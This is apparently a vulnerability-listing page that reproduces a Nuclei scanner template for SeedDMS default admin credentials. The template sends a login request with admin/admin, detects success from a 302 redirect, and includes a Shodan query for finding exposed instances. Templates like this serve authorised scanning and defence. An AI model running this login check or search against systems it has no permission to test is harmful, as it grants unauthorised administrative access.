漏洞描述
SeedDMS default admin credentials were discovered.
seeddms-default-login: SeedDMS Default Login
PoC代码[已公开]
id: seeddms-default-login
info:
name: SeedDMS Default Login
author: alifathi-h1
severity: high
description: SeedDMS default admin credentials were discovered.
reference:
- https://www.seeddms.org/index.php?id=2
- https://www.redhat.com/sysadmin/install-seeddms
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:seeddms:seeddms:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.title:"SeedDMS"
product: seeddms
vendor: seeddms
tags: default-login,seeddms,vuln
http:
- raw:
- |
POST /op/op.Login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
login={{username}}&pwd={{password}}&lang=
payloads:
username:
- admin
password:
- admin
attack: pitchfork
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Location: /out/out.ViewFolder.php'
- type: status
status:
- 302
# digest: 4b0a004830460221008e78a4b99cfd0aaf91de7ef7c9734fbad0fe411640b3a7649fcf993ebd0e68fa022100ca7b6267f773dfa1554b8370c0a97e1291f61947f4a6db91c85835a29f64cdf9:922c64590222798bb761d5b6d8e72950